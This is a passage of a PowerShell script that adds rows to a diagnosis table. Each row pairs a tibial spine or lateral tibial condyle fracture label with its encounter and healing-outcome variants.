of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of right tibial spine","Displaced fracture of right tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of left tibial spine","Displaced fracture of left tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of unspecified tibial spine","Displaced fracture of unspecified tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of right tibial spine","Nondisplaced fracture of right tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of left tibial spine","Nondisplaced fracture of left tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of unspecified tibial spine","Nondisplaced fracture of unspecified tibial spine, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of right tibia","Displaced fracture of lateral condyle of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of left tibia","Displaced fracture of lateral condyle of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral condyle of unspecified tibia","Displaced fracture of lateral condyle of unspecified tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of right tibia","Nondisplaced fracture of lateral condyle of right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of left tibia","Nondisplaced fracture of lateral condyle of left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified tibia","Nondisplaced fracture of lateral condyle of unspecified tibia, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral condyle of unspecified 